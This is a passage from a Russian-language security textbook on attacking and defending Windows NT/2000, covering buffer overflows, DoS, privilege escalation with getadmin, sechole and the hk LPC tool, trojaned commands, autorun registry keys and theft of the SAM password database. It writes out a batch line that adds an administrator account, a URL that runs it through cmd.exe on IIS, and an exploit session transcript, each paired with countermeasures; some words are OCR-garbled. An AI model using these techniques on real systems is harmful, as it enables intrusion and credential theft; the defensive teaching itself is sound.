    Теоретически, учитывая огромный объем и сложность исходного кода Windows NT, в нем должно существовать довольно много изъянов подобного рода. Однако, как видно из табл. 5.3, между двумя изданиями этой книги практически не появилось новых хакерских программ, вызывающих переполнение буфера самой операционной системы NT/2000. В то же время, как видно из табл. 5.3, службы (IIS) и приложения (Outlook) системы Windows являются достаточно уязвимыми. Поэтому не стоит рассчитывать на абсолютную защищенность операционной системы: все возрастающий поток исследований проблемы переполнения буфера Win32 в любой момент может привести к прорыву обороны.

    Таблица 5.3. Некоторые публикации о выявленных ошибках переполнения буфера Windows

    Мишень и разработчики программы взлома
    Адрес URL
    Принцип действия
    Netmeeting 2x, группа хакеров Cult of the Dead Cow (cDc)
    http://www.cultdeadcow.com/ cDc_files/cDc-351
    Проверка концепции, сводящаяся к загрузке графического файла с узла cDc
    NT RAS, группа Cerberus Information Security (CIS)
    http://www. infowar.co.uk/ mnemonix/ntbufferoverruns.htm
    Открытие окна командной строки с привилегиями System
    winhlp32, группа CIS
    http://www.infowar.со.uk/ mnemonix/ntbufferoverruns.htm
    Запуск командного файла с привилегиями System
    IISHack, компания еЕуе
    http://www.eeye.com
    Выполнение заданного кода на Web-сервере, работающем под управлением NT US
    Oracle Web Listener 4.0, группа CIS
    http://www.cerberus-infosec. co.uk/advowl.html
    Удаленное выполнение команды с привилегиями System
    Outlook GMT, лаборатория Underground Security Systems Research (USSR)
    http: //www.ussrback.com/labs50.html
    Переполнение буфера за счет выполнения заданного кода при синтаксическом анализе электронного сообщения

    Контрмеры: защита от переполнения буфера



    Лучшим ответом на атаки с применением переполнения буфера является профессиональное программирование. Упоминавшиеся выше статьи предоставляют опытному программисту некоторые идеи, реализация которых позволит избежать подобной угрозы при написании приложений (при их изучении пригодится знание языка С и низкоуровневого языка программирования Assembler). Однако поскольку создание программных продуктов, подобных системе Windows, выполняется практически без непосредственного участия пользователей, то ответственность за устранение выявленных проблем должна ложиться на плечи группы разработчиков.
    Для разрешения проблемы переполнения буфера могут использоваться различные программные продукты. Одним из самых новых средств этой категории является программа BOWall Андрея Колишака (Andrey Kolishak). Программа BOWall предотвращает переполнение буфера двумя способами.

    •  Замещает библиотеки DLL их двоичными копиями, в которые включены процедуры мониторинга вызовов потенциально уязвимых функций (например, strcpy, wstrcpy, strncpy, wstrncpy, strcat, wcscat, strncat, wstrncat, memcpy, memmove, sprintf, swprintf, scanf, wscanf, gets, getws, fgets, fgetws). После этого вызовы таких функций проверяются на предмет целостности возвращаемого адреса стека (stack return address).
    •  Ограничивает выполнение функций динамических библиотек из сегмента данных и стека (data and stack memory).

    Замещение системных динамически подключаемых библиотек для предотвращения переполнения буфера является несколько кардинальным, однако все же такой подход, очевидно, достоин внимания.
    Программа eNTercept от компании ClickNet Software Corp. представляет собой систему предотвращения вторжений, которая может использоваться в качестве оболочки ядра системы NT, которая обеспечивает мониторинг всех вызовов. Это приложение хорошо подходит для выявления и предотвращения известных атак, направленных на переполнение буфера.
    По адресу http://immunix.org/ можно получить улучшенную версию компилятора GNU С (gcc) StackGuard. С его помощью можно генерировать исполняемые файлы, которые более устойчивы к разрушению стека, чем обычные программы. Это достигается путем помещения слова-признака (canary word) за адресом возврата при вызове функции. Если после завершения выполнения функции это слово-признак оказалось другим, значит, была предпринята попытка переполнения буфера. При этом программа, скомпилированная с помощью StackGuard, помещает соответствующую запись в системный журнал. Поскольку в рассмотренном случае требуется использование компилятора gcc, то описанный подход неприменим в системе NT. Однако, возможно, некоторые из читателей все же будут вдохновлены...
    Впоследствии для устранения подобных атак потребуются кардинальные изменения в программных моделях (например, язык Java, в котором отсутствуют внутренние структуры, затрагиваемые при этом) или в самой архитектуре центральных процессоров.

     Отказ в обслуживании (DoS)



    Атаки, приводившие к генерации состояния DoS, были чрезвычайно популярны в 1997-1998 годах, что объясняется появлением многочисленных утилит, предназначенных для повреждения стека TCP/IP на самых различных платформах. Некоторые из них были направлены исключительно на систему Windows. Мы не будем тратить время на описание всех используемых при этом недостатков реализации стека протоколов TCP/IP, поскольку все они уже устранены в пакетах обновления. Кроме того, обсуждению атак DoS посвящена целая глава (см. главу 11, а также часть главы 4, где были рассмотрены методы предотвращения подобных угроз для платформы Win 9х).
    Генерация состояния отказа в обслуживании не всегда преследует цель вызвать раздражение сетевого администратора. Зачастую такой подход используется для того, чтобы добиться перезагрузки системы и автоматического запуска требуемых утилит. Как вы увидите позднее, изучение кода многочисленных файлов загрузки Windows NT является одним из эффективных методов проникновения в систему.

     Контрмеры: предотвращение состояния DоS



    Установка самого последнего сервисного пакета (при написании книги — версии 6А) позволяет защитить систему NT от большинства известных способов генерации состояния DoS. Кроме того, следите также за появлением промежуточных пакетов обновления, особенно, если они относятся непосредственно к стеку протоколов TCP/IP систем NT/2000, tcpip.sys. (Естественно, обновление используемой операционной системы до Win 2000 позволяет достигнуть того же результата.) Многие серьезные атаки DoS, связанные с применением средств land, newtear и ООВ, стали недоступными после установки промежуточных пакетов обновления, появившихся после SP3. Конечно, обновление до Win 2000 представляет собой самый лучший сервисный пакет, в котором нашли отражение все выпущенные ранее пакеты обновления.

    Для получения более подробной информации о ключах системного реестра, с помощью которых от атак DoS можно защитить серверы Internet под управлением Windows, читайте главу 6.

    Мы рекомендуем познакомиться также с другими программными продуктами, направленными на предотвращение атак DoS на стек TCP/IP, таких как teardrop, land, OOB и т.д. Они подробно рассматриваются в главе 12.
    Модули обновления, появившиеся после сервисного пакета SP3, позволяют устранить угрозу атак DoS с применением таких средств, как snork и пгрс (обоим утилитам требуется доступ к портам с номерами 135-139).
    Теперь снова вернемся к обсуждению приемов получения статуса администратора.

    Расширение привилегий



    Предположим, что попытка подбора пароля увенчалась успехом — в ваших руках регистрационное имя и связанный с ним пароль пользователя интересующего вас сервера NT, не имеющего прав администратора. В мире NT шаг, заключающийся в получении доступа к системе в качестве одного из ее пользователей, несмотря на всю его сложность, является сравнительно простым. Последующие шаги потребуют гораздо больших знаний, изобретательности и везения. Так, например, существуют средства, позволяющие расширить полномочия, соответствующие пользовательской учетной записи. Однако, как уже отмечалось, этим средствами нельзя воспользоваться, обладая правами лишь обычного пользователя NT, так как такой пользователь по умолчанию не имеет права интерактивной регистрации. Однако если системный администратор допустил несколько серьезных промахов, с помощью этих средств взломщик сможет расширить свои полномочия.
    В этом разделе мы приведем основные принципы расширения полномочий учетной записи обычного пользователя до уровня учетной записи Administrator. В ходе рассмотрения мы коснемся также некоторых возможностей по использованию тех или иных средств для выполнения несанкционированных операций как с удаленного компьютера, так и с локальной консоли.

    Сбор информации



    Если взломщику удалось завладеть учетной записью пользователя, не обладающего правами администратора, то единственной реальной возможностью, которой ему осталось воспользоваться, является дальнейший сбор информации, которая позволит расширить привилегии. В процессе сбора таких данных используются многие методы инвентаризации, которые уже упоминались в главе 3. Анализируя все полученные сведения, взломщик может получить доступ к критичным ресурсам. Вот некоторые из средств и приемов для сбора важных данных.

    •  Утилита srvinfo из набора NTRK может использоваться для поиска совместно используемых ресурсов. При этом важными источниками информации являются папки %systemroot%system32 и \repair, а также доступные для записи папки Web- или FTP-сервера.
    •  Стандартная утилита поиска системы Windows может использоваться для поиска строка вида password в файлах .bat или файлах сценариев.
    •  Утилиту regdmp из набора NTRK или команда Connect Network Registry редактора системного реестра можно попробовать применить для получения доступа к различным частям системного реестра.

    Этот процесс высасывания (hoovering) информации из всех "закоулков" получил свое определение в английском языке по названию производителя популярных пылесосов.

    Контрмеры: защита от сбора информации



    Для проверки степени защищенности системы от деятельности подобного рода лучше всего попробовать выполнить описанные действия самостоятельно. Для этого зарегистрируйтесь на удаленном компьютере под именем обычного пользователя и проверьте, удастся ли такому пользователю выполнить описанные выше операции. Автоматизировать процесс поиска можно с использованием команд find и findstr системы NT.
    Далее мы опишем некоторые механизмы, с помощью которых взломщик может добавить себя в группу Administrators.

    Утилита getadmin



    getadmin — это небольшая программа, написанная Константином Соболевым (Konstantin Sobolev), которая добавляет пользователя в локальную группу Administrators. Она использует низкоуровневую процедуру ядра NT для установки глобального флага, позволяющего получить доступ к любому запущенному процессу, а затем с помощью приема, называемого внедрение в DLL (DLL injection), вставить специальный исполняемый код в какой-нибудь процесс, который обладает привилегией добавления пользователей в группу Administrators. (Как правило, в качестве такого процесса выбирается winlogon, который использует учетную запись System). Более подробная информация об утилите getadmin и ее исполняемый код можно найти по адресу http://www.ntsecurity.net/security/getadmin.htm.
    Мощь утилиты getadmin несколько затмевает тот факт, что она должна быть запущена локально. Поскольку большинство пользователей по умолчанию не могут зарегистрироваться на сервере NT локально, эта утилита, как правило, может помочь только в создании фиктивных членов различных встроенных групп Operators (Account, Backup, Server и т.д.) и используемой по умолчанию учетной записи сервера Internet IUSR._имя_машины при наличии соответствующих привилегий. Однако если злоумышленники уже имеют такой уровень привилегий на вашем сервере, то утилита getadmin не сможет усугубить ситуацию, так как они и без ее помощи имеют доступ ко всем требуемым ресурсам.
    Утилита getadmin запускается из командной строки следующим образом: getadmin имя_пользователя. Прежде чем воспользоваться полученными привилегиям, новый пользователь, добавленный в группу Administrators, сначала должен завершить текущий сеанс работы. (Для того чтобы убедиться, что пользователь получил права администратора, достаточно попробовать запустить утилиту windisk. Это сможет осуществить только член группы Administrators.)

    Контрмеры: защита от использования ynunnugetadmin



    Изъян, на котором основывается принцип работы утилиты getadmin, исправлен в дополнительном модуле обновления к сервисному пакету SP 3. Этот модуль входит также во все впоследствии выпущенные сервисные пакеты. Согласно некоторым источникам, модернизированная версия утилиты getadmin, названная crash4, способна обойти исправления, если она будет запушена перед getadmin. Однако нет каких-либо подтверждений, что этот прием является работоспособным.
    В связи с тем, что для выполнения большинства потенциально опасных операций в системе NT на удаленном компьютере требуются привилегии администратора, извлечь какую-то пользу из применения getadmin при удаленном подключении достаточно проблематично. Для этого необходимо совпадение двух событий: взломщик должен иметь доступ к какому-нибудь каталогу, открытому для записи, а также право выполнения программ, содержащихся в этом каталоге. Как можно добиться такого результата, вы узнаете чуть ниже.

    Утилита sechole



    Утилита sechole предоставляет те же возможности, что и getadmin: она добаштяет текущего пользователя в локальную группу администраторов. Обновленная версия этой утилиты secholed помещает пользователя в группу администраторов домена.) Однако для выполнения тех же действий, что и getadmin, эта утилита использует другие механизмы. Как отмечают Прасад Дабак (Prasad Dabak), Сандип Фадк (Sandeep Phadke) и Милинд Бора (Milind Borate), sechole модифицирует в оперативной памяти код вызова процедуры OpenProcess, и это позволяет ей успешно подключаться к привилегированному процессу, независимо от того, имеет ли она для этого соответствующие разрешения. После успешного подключения она работает так же, как и утилита getadmin, выполняя код внутри процесса-носителя, и добавляет текущего пользователя в указанную группу Administrators. Полный код и подробное описание можно найти на Web-узле NT Security по адресу http://www.ntsecurity.net/security/sechole.htm.
    Подобно getadmin, утилита sechole должна быть запущена локально. Однако, если на целевом узле запущен сервер IIS компании Microsoft и, кроме этого, выполняются и некоторые дополнительные условия, sechole можно запустить и удаленно, добавив используемую по умолчанию учетную запись пользователя Internet 1изк_имя_машины в группу Administrators или Domain Admins. Вот описание того, как это можно осуществить.

    Удаленный запуск утилиты sechole



    Рассмотрим пример применения основного подхода, используемого при нападении на Web-серверы, который в различных формах применяется в Internet. Успешность такой атаки зависит от того, существует ли каталог US-сервера, доступный для записи и запуска программ. К счастью, компания Microsoft "предоставила" много каталогов с такими разрешениями, используемыми по умолчанию.
    Виртуальные каталоги сервера 1IS, представленные в табл. 5.4, помечены как доступные для выполнения. Соответствующие им физические каталоги (также перечисленные в табл. 5.4.) по умолчанию имеют разрешения Read, Write, Execute и Delete (RWXD).
    После анализа заданных по умолчанию разрешений становится очевидно, что сервером может быть выполнен любой ложный исполняемый файл, расположенный в любом из этих каталогов. У взломщика имеется лишь одно препятствие: удаленно поместить в какой-либо из этих каталогов требуемый исполняемый файл.
    На самом деле это совсем не трудно, как может показаться на первый взгляд. Для этих целей можно воспользоваться открытыми для совместного использования разделами жесткого диска, неудачно организованными каталогами FTP, которые перекрывают каталоги, представленные в табл. 5.4. Для решения поставленной задачи можно воспользоваться также недостаточно защищенными командами удаленного управления (например, telnet), методами PUT протокола HTTP или даже средствами авторизации в Web, предоставляемыми приложением FrontPage.
    Предположим, что взломщику удалось воспользоваться какой-нибудь из перечисленных возможностей и успешно загрузить утилиту sechole и связанные с ней библиотеки DLL в один из каталогов, представленных в табл. 5.4. И что теперь? Поскольку эта программа запускается из командной строки, то взломщику необходимо поместить в тот же каталог и командный интерпретатор (в системе NT командный интерпретатор, cmd.exe, находится в каталоге %windir%\system32).

    Таблица 5.4. Виртуальные каталоги сервера US, имеющие по умолчанию разрешения Execute, к соответствующие им физические каталоги

    Виртуальный каталог
    Физическое расположение
    /W3SVC/l/ROOT/msadc
    C \program f iles\common\system\msadc
    / W3 SVC /1/ROOT/News
    C \InetPub\News
    /W3SVC/l/ROOT/Mail
    C \InetPub\Mail
    /W3 SVC/1/ROOT/ cgi -bin
    C \InetPub\wwwroot\cgi-bin
    /W3 SVC/1/ROOT/ scripts
    C \InetPub\scripts
    /W3SVC/1/ROOT/ iisadmpwd
    С \WINNT\System32\inetsrv\iisadmpwd
    /W3SVC/l/ROOT/_vti_bin
    (Отсутствует, если не установлены расширения FrontPage)
    /W3SVC/l/ROOT/_vti_bin/ vti_adm
    (Отсутствует, если не установлены расширения FrontPage)
    /W3SVC/l/ROOT/_vti_bin/_vti_aut
    (Отсутствует, если не установлены расширения FrontPage)

    Однако не будем торопиться. Выше уже упоминалось, что утилита sechole добавляет пользователя в локальную или доменную группу администраторов. Если же она была запущена посредством Web-броузера, то в группу администраторов будет добавлена учетная запись 1изп_имя_машины. А это не очень хорошо, поскольку этой учетной записи назначается случайный пароль, который взломщику придется подбирать при удаленной регистрации. Как же в группе администраторов создать новую учетную запись пользователя с паролем, который выбрал сам взломщик? Это просто осуществить с помощью встроенной команды net localgroup. Создайте простой командный файл (например, с именем adduser.bat) со следующей строкой:
    net user mallory qpensesame /add && net localgroup administrators mallory /add
    После того как в требуемый каталог помещены утилита sechole, связанные с ней динамически подключаемые библиотеки, командный интерпретатор cmd.exe и файл adduser.bat, для его запуска взломщику достаточно ввести соответствующий адрес URL в Web-броузере, подключенном к удаленному компьютеру. В примере, показанном на рис. 5.4, утилита sechole была помещена в виртуальный каталог /WSSVC/I/ROOT/SCRIPTS (т.е. в физический каталог C:\inetpub\SCRiPTS), а затем запущена с помощью соответствующего адреса URL.



    Рис. 5.4. Взлом удаленной системы с помощью утилиты sechole

    Далее вместо того чтобы регистрироваться с использованием учетной записи IUSR, пароль которой пока неизвестен, взломщик добавит нового пользователя с помощью файла сценария adduser.bat, запущенного в броузере с использованием следующего сложного адреса URL.
    http://192.168.202.154/scripts/cmd.exe?/c%20c:\inetpub\scripts\adduser.bat
    Подстрока %20 интерпретируется Web-сервером как символ пробела, что приводит к преобразованию адреса URL в команду, которая выполнится на удаленном узле (команда cmd /с будет передавать команды, содержащиеся в файле adduser.bat, командной оболочке).
    Теперь, когда учетная запись IUSR внесена в группу администраторов и добавлен новый пользователь с привилегиями администратора, взломщик стал "владельцем" Web-сервера.

    Контрмеры: защита от применения утилиты sесhо1е



    Существует два простых метода защиты как от утилиты sechole, так и от удаленного выполнения команд в Web. Во-первых, установите самый последний сервисный пакет (6А или более новый). Для систем, на которых установлен сервисный пакет SP5, можно воспользоваться модулем обновления. Более подробную информацию можно получить в статье KB Q190288. Затем, независимо от того, волнует ли вас проблема sechole или нет, запретите доступ для записи в каталоги сервера Internet, в которых содержатся исполняемые файлы (см. табл. 5.4). Для этого проще всего заблокировать доступ к портам TCP и UDP сервера с номерами 135-139 и, таким образом, исключить доступ к совместно используемым ресурсам Windows. Если доступ с использованием протокола SMB заблокирован, обязательно убедитесь в том, отключен также доступ на запись по протоколу FTP.
    Еще один метод решения проблемы заключается в отключении разрешений Execute для виртуального Web-сервера. Они могут устанавливаться глобально в группе параметров Application Settings во вкладке Home Directory диалогового окна свойств Default Web Site Properties, доступ к которому можно получить с помощью консоли управления Microsoft (рис. 5.5).
    Свойства других каталогов можно установить отдельно, в стандартном окне свойств, которое появляется на экране после щелчка правой кнопкой мыши на соответствующей пиктограмме в окне проводника Windows. В открывшемся окне свойств перейдите во вкладку Web Sharing и щелкните на кнопке Edit Properties (см. рис. ниже).



    Рис. 5.5. Вкладка Ноте Directory диалогового окна свойств виртуального Web-сервера, на которой отключены разрешения Execute


    После щелчка на кнопке Edit Properties на экране появится диалоговое окно, показанное на следующем рисунке.


    Менее известный способ расширения привилегий, обеспечиваемый утилитой besysadm, появился после выпуска сервисного пакета Service Pack 5. Информацию о соответствующем модуле обновления можно найти по адресу http://www. microsoft.cam/technet/eecurity/bullatin/ms99-006.asp

    Ложные запросы к портам LPC



    Такую возможность обнаружила группа исследователей RAZOR (http://razor. bindview.com) и предоставила авторам проверочный код, который, однако, не был открыт для широкого использования. В приведенном коде иллюстрируется изъян одной из функций интерфейса с портами LPC (Local Procedure Call — локальный вызов процедур), который позволяет потокам и процессам на локальном узле взаимодействовать друг с другом. Обычно порты LPC обеспечивают интерфейс между потоком сервера и клиентными потоками, которые генерируют запросы на использование служб. Кроме того, порты LPC выполняют проверку легитимности клиента. Однако взломщик, у которого имеется возможность создать оба потока, и сервера и клиента. может обойти такую проверку и связать клиентный поток с любым пользователем, даже имеющим привилегии SYSTEM.
    Воспользуемся утилитой hk от группы RAZOR и добавим в группу администраторов пользователя mallory, входящего в состав группы Backup operators и имеющего разрешение на интерактивную регистрацию.
    Во-первых, с помощью утилиты whoami из пакета NTRK убедимся, что пользователь mallory действительно принадлежит к группе Backup Operators, а не администраторов.

    С:\>whoami
    [Group 1] = "IIS47\None"
    [Group 2] = "Everyone"
    [Group 3] - "BUILTIN\Users"
    [Group 4] = "BUILTINXBackup Operators"

    Кроме того, удостоверимся в том, что пользователь Mallory не может добавить себя п группу администраторов самостоятельно.

    C:\>net looalgroup administrators mallory /add
    System error 5 has occurred.
    Access is denied,

    Теперь воспользуемся командой net use совместно с утилитой hk.

    C:\>hk net localgroup administrators mallory /add
    Isass pid & tid are: 47 - 48
    NtlmpersonateClientOfPort succeeded
    Launching line was: net localgroup
    administrators mallory /add
    Who do you want to be today?

    Теперь Мэлори (Mallory) принадлежит к группе администраторов, как видно из приведенного листинга.

    C:\>net localgroup administrators
    Alias name administrators
    Comment Members can fully administer the computer/domain
    Members
    -------------------------
    Administrator mallory
    The command completed successfully.

    Применяйте модули обновления!



    Компания Microsoft выпустила модуль обновления сервисного пакета SP6A, который изменяет вызов функции проверки достоверности, входящей в состав программного интерфейса с портами LPC. Этот модуль обновления можно найти в бюллетене MS00-003 компании Microsoft по адресу http://www.microsoft.com/technet/security/bulletin/ms00-003.asp.
    Не лишним будет еще раз повторить, что это модуль обновления сервисного пакета SP6A. Многие организации предпочитают ожидать выпуска следующего сервисного пакета. Такая позиция довольно безрассудна, поскольку до того, как компания Microsoft выпустит сервисный пакет SP7, компьютеры таких компаний остаются уязвимыми для взломщиков. Если SP7 никогда не выйдет в свет, эта ситуация не изменится до тех пор, пока не будет выполнено обновление до Win 2000. Так что лучше всего воспользоваться модулями обновления!
    Теперь перейдем к рассмотрению некоторых других методов, с помощью которых взломщик может запустить утилиты getadmin, sechole, besysadm, hk и другие программы, предназначенные для расширения привилегий.

    "Троянские кони" и параметры реестра



    Основной принцип расширения привилегий заключается в том, чтобы ввести в заблуждение других пользователей (лучше всего администратора) и выполнить код, который позволит учетной записи взломщика получить привилегии суперпользователя. Аналогичный подход состоит во внедрении какого-либо кода, который будет выполнен при наступлении некоторого обычного события в системе (например, в процессе перезагрузки). Обе из этих стратегий, а также методы борьбы с ними, обсуждаются ниже.

    Многие из описанных ниже методов гораздо глубже и полнее освещаются на страницах прекрасного Web-узла Security Bugware, которые можно найти по адресу http://Oliver.efri.hr/-crv/security/bugs/NT/getadmt#].html, где # — числа от 2 до 7.

    "Троянские кони" и расширение привилегий



    "Троянский конь" (Trojan horse) — это программа, которая предоставляет некоторые полезные функции, однако на самом деле предназначена для скрытного выполнения злонамеренных или разрушительных действий (для получения более подробной информации читайте главу 14). От одной только мысли о возможностях, открывающихся при переименовании стандартных утилит NT, голова идет кругом! Например, вместо программы regedit.exe взломщик может поместить в каталог winnt\system32 командный файл regedit.cmd. Когда ничего не подозревающий администратор введет в командной строке regedit, чтобы выполнить какие-то операции с системным реестром, будет запущен командный файл. Обычно с его помощью выполняется тот или иной вариант следующей команды. net localgroup administrators <пользователь> /add
    Таким образом, администратор собственноручно внес учетную запись взломщика в группу Administrators.

    Контрмеры: защита от "троянских коней"



    Хотя предлагаемые контрмеры и не обеспечивают стопроцентной защиты, все же будьте внимательны при запуске приложений. Обращайте внимание на различные аномалии (например, быстро промелькнувшее окно командной строки в момент вызова полноценной программы Windows).
    При выявлении "троянских коней" могут оказаться полезными некоторые средства. К ним относятся встроенные утилиты, например dir, которая при использовании параметра /С выводит размер файлов, а при указании параметра /Т также время его создания, последнего доступа и последней модификации. Команду dir использовать гораздо лучше, чем проводник Windows, поскольку она не изменяет временные параметры файлов. Можно воспользоваться также мощными коммерческими программами защиты файловой системы, например программой Tripwire от компании Tripewire, Inc. (см. табл. 5.2). Эта программа создает для файлов зашифрованные контрольные суммы, так что с ее помощью можно выявить любые изменения.

    Подсистема защиты файлов системы Win 2000 (WFP — Windows File Protection) обеспечивает хранение резервных копий около шестисот важных файлов в каталоге %windir% и предотвращает их от перезаписи.

    Поскольку "троянских коней" очень трудно обнаружить (особенно те из них, которые выполняют модификацию самого ядра NT), стоит поддерживать максимальные меры предосторожности. А именно, создавайте резервные копии своих данных, переустанавливайте операционную систему и все приложения только с проверенных носителей информации. Некоторые из наиболее коварных "троянских коней", называемых наборами rootkit, будут рассмотрены ниже в данной главе.

    Параметры реестра, обеспечивающие выполнение программ



    Еще одним хорошим методом скрытого запуска командного файла является использование специальных значений в системном реестре NT. В зависимости от разрешений пользователя, под именем которого взломщик проник в систему, ему могут быть доступны некоторые из таких параметров системного реестра. Помните, что удаленный доступ к системному реестру могут получить только администраторы, а на консоли сервера могут зарегистрироваться лишь несколько пользователей из встроенных учетных записей NT. Поэтому вероятность того, что взломщику удастся воспользоваться описанным здесь способом, очень мала. Ему повезет только в том случае, когда используемая им учетная запись входит в группу Server Operators. В табл. 5.5 перечислены некоторые параметры системного реестра и разрешения, установленные для них по умолчанию, которыми могут воспользоваться взломщики для запуска программ.

    Таблица 5.5. Параметры системного реестра, которые можно использовать для вызова программ, расширяющих привилегии пользователя

    Параметр
    Разрешения по умолчанию
    Значение, позволяющее запуск
    HKLM\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run
    Everyone: Set Value
    [любое]
    HKLMX SOFTWARE \Microsoft\Windows\ CurrentVersion \RunOnce
    Server Operators: Set Value
    [любое]
    HKLMX SOFTWARE \Microsoft\Windows\ Cur rent Version \RunOnceEx
    Everyone: Set Value
    [любое]
    HKLMX SOFTWARE\Microsoft\WindowsNT\ CurrentVers i on \ AeDebug
    Everyone: Set Value
    Debugger
    HKLMX SOFTWARE\Microsoft\WindowsNT\ CurrentVer si on XWinlogon
    Server Operators: Set Value
    Userinit

    Защита параметров системного реестра



    С использованием редактора системного реестра regedt32 для этих параметров необходимо задать следующие разрешения.

    •  CREATOR OWNER: Full control
    •  Administrators: Full Control
    •  SYSTEM: Full control
    •  Everyone: Read

    Подобная настройка может повлиять на работоспособность некоторых приложений. Поэтому сначала удостоверьтесь, что внесенные изменения не отразились на функциональности системы. Кроме того, не забывайте о том, что описанные выше параметры системного реестра зачастую используются для скрытого запуска приложений во время загрузки, о чем более подробно вы узнаете ниже в данной главе.

    Несколько заключительных слов о расширении привилегий



    Теперь у вас не вызывает сомнений тот факт, что расширить привилегии чрезвычайно сложно. Единственное, что может помочь взломщику, — это грубые ошибки в настройке системы или же получение доступа к учетной записи, которая и так обладает достаточно высокими привилегиями (например, является членом группы Server Operators). Далее мы рассмотрим самый худший (с точки зрения безопасности) сценарий -— взломщик получил доступ к системе на уровне администратора.


    8.gif

    Изображение: 

    9.gif

    Изображение: 

    10.gif

    Изображение: 

    11.gif

    Изображение: 

    7. Расширение привилегий



    Расширение привилегий


    У вас может возникнуть вопрос: "Стоит ли читать, что может произойти, когда кто-то получит права администратора на моем компьютере? И так все ясно!" Не спешите с выводами — отформатировать жесткий диск и переустановить систему с установочных дисков вы всегда успеете. Гораздо важнее попытаться установить, какие ресурсы были использованы взломщиком и как далеко ему удалось продвинуться. Взломщик мог назначить привилегии администратора локальной системы какому-нибудь пользователю, не имеющему практически никаких прав для доступа к другим компьютерам сети. Поэтому ему, скорее всего, понадобится установить в сети дополнительные средства, с помощью которых он мог бы расширить свои полномочия. Выявить взломщика на этом этапе и остановить его проникновение не только возможно, но и жизненно необходимо. В данном разделе вы найдете подробное описание некоторых основных средств и методов, используемых в этой чрезвычайно важном "финальном поединке" взломщика и системного администратора.

    Взлом базы данных SAM



    Получив привилегии администратора, взломщик, скорее всего, сразу же направится к диспетчеру SAM системы NT (SAM — Security Accounts Manager). В базе данных SAM содержатся имена и зашифрованные пароли всех пользователей локального узла или домена, если взламываемая система является контроллером. Поэтому данные SAM — наиболее вожделенная цель для нанесения завершающего удара, подобная файлу /etc/passwd из мира UNIX. Даже если база данных SAM получена с автономной станции NT, существует шанс получения с ее помощью доступа к контроллеру домена. Таким образом, взлом диспетчера SAM — это один из наиболее мощных методов расширения привилегий и использования доверительных отношений.
    Стоп, скажет внимательный читатель, а как же зашифрованные пароли? Неужели шифрование не сможет свести на нет все попытки хакеров? Теоретически — да, однако на практике дела обстоят не совсем так. К сожалению, для обеспечения обратной совместимости компания Microsoft значительно ослабила безопасность SAM, используя алгоритм хэширования (одностороннего шифрования), оставшийся в наследство NT от сетей Lan Manager. Хотя поддерживается и новый алгоритм NT, операционная система вынуждена хранить вместе с новым хэш-кодом и хэш-код, вычисляемый по старому алгоритму LanManager, чтобы обеспечить совместимость с клиентами Windows 9х и Windows for Workgroups. Более простой алгоритм хэширования LanManager уже давно был изучен, поэтому в большинстве случаев пароли сервера NT можно получить достаточно просто. Все зависит лишь от их длины и набора символов. Например, lOplncrack, одна из самых популярных утилит взлома файлов SAM, позволяет взломать любой буквенно-цифровой пароль за 24 часа на компьютере с процессором Pentium II 450 МГц (версия 2.5; подробнее см. http://www.10pht.com/10phtcrack). Техническое обоснование слабости подхода, применяемого при хэшировании паролей в NT, приведено по адресу http://www. l0pht.com/l0phtcrack/rant.html, а также содержится ниже в разделе "Строгие Правила Выбора Пароля" этой главы.
    Утилиты взлома паролей, несмотря на кажущуюся сложность решаемой ими задачи, на самом деле не что иное, как быстрые и оптимизированные инструменты автоматизированного подбора паролей. Сначала по заданным входным данным (список слов из словаря или случайным образом генерируемые строки) и с использованием алгоритма шифрования они получают результат, а затем сравнивают его с хэш-кодом пользовательского пароля. Если оба значения совпадают, значит, пароль угадан, т.е. "взломан". Данный процесс обычно выполняется в автономном режиме с использованием перехваченного файла паролей, поэтому блокировки учетной записи в таких случаях вообще не возникает, а процесс подбора пароля может продолжаться сколь угодно долго. Как правило обработка зашифрованных данных оказывается весьма ресурсоемким процессом. Однако, как мы уже упоминали, знание тех или иных недостатков взламываемой системы, к каким, например, относится хорошо изученный алгоритм хэширования LanMan, позволяет значительно ускорить этот процесс. Таким образом, получение пароля — это лишь вопрос производительности процессора и размера словаря (некоторые примеры словарей и списков слов можно найти по адресу http://coast.cs.purdue.edu).
    He хотите ли воспользоваться этими инструментами, чтобы проверить, насколько хороши выбранные вашими пользователями пароли? Что ж, тогда приступим.

    Получение базы данных SAM



    При осуществлении любых попыток взлома первый этап состоит в получении файла паролей, который в случае NT называется файлом данных SAM.
    Система NT хранит данные SAM в файле с именем (ни за что не догадаетесь!) SAM, который содержится в каталоге %systemroot%\system32\config (во время работы операционной системы доступ к этому файлу заблокирован). Файл SAM является одним из пяти основных ульев системного реестра NT и представляет собой физическое место хранения данных из группы параметров системного реестра HKEY_LOCAL_MACHINE\SAM. Эта группа параметров недоступна для изменения, даже после регистрации в качестве администратора. (Однако, используя некоторые хитрости и службу Schedule, это все же можно осуществить. Для получения об этом более подробной информации читайте раздел "Аудит Доступа К Базе Данных SAM?" ниже в этой главе).
    Существует четыре способа получения данных SAM: перезагрузка компьютера с помощью дискеты с альтернативной операционной системой и последующее копирование файла SAM на съемный носитель; копирование резервной копии файла SAM, созданной утилитой восстановления системы NT; извлечение хэшированных паролей непосредственно из SAM. Четвертый метод основывается на перехвате данных об именах пользователей и паролях, передаваемых по сети (такой подход уже рассматривался в разделе "Перехват паролей, передаваемых по сети" выше в этой главе).

    Перезагрузка с помощью альтернативной операционной системы



    Для того чтобы перезагрузиться с использованием другой операционной системы, достаточно подготовить системную дискету с DOS. Если на жестком диске интересующего вас компьютера установлена файловая система NTFS, то на эту дискету необходимо поместить соответствующий драйвер NTFS, называемый NTFSDOS, от компании Systems Internals (http://www.sysinternals.com/). С помощью этого драйвера все разделы NTFS будут смонтированы в качестве логических дисков DOS, после чего не останется никаких препятствий для копирования файла SAM.

    Извлечение резервной копии файла SАМ из каталога Repair



    При каждом запуске утилиты NT Repair Disk Utility (rdisk) с параметром /s, который активизирует режим резервного копирования важной системной информации, создается сжатая версия базы данных SAM, которая помещается в каталог %systemroot%\repair под именем Sam._. После завершения копирования важных данных на аварийную дискету многие системные администраторы не утруждают себя задачей удаления этого файла.
    Для того чтобы воспользоваться сжатым файлом Sam._, его нужно сначала распаковать, как показано в следующем примере. (Последняя версия утилиты L0phtcrack позволяет выполнить эту операцию автоматически после выбора команды import.)

    С:\>expand sam._sam
    Microsoft (R) File Expansion Utility Version 2.50
    Copyright (C) Microsoft Corp 1990-1994.
    All rights reserved.
    Expanding sam._ to sam.
    sam._: 4545 bytes expanded to
    16384 bytes, 260% increase.

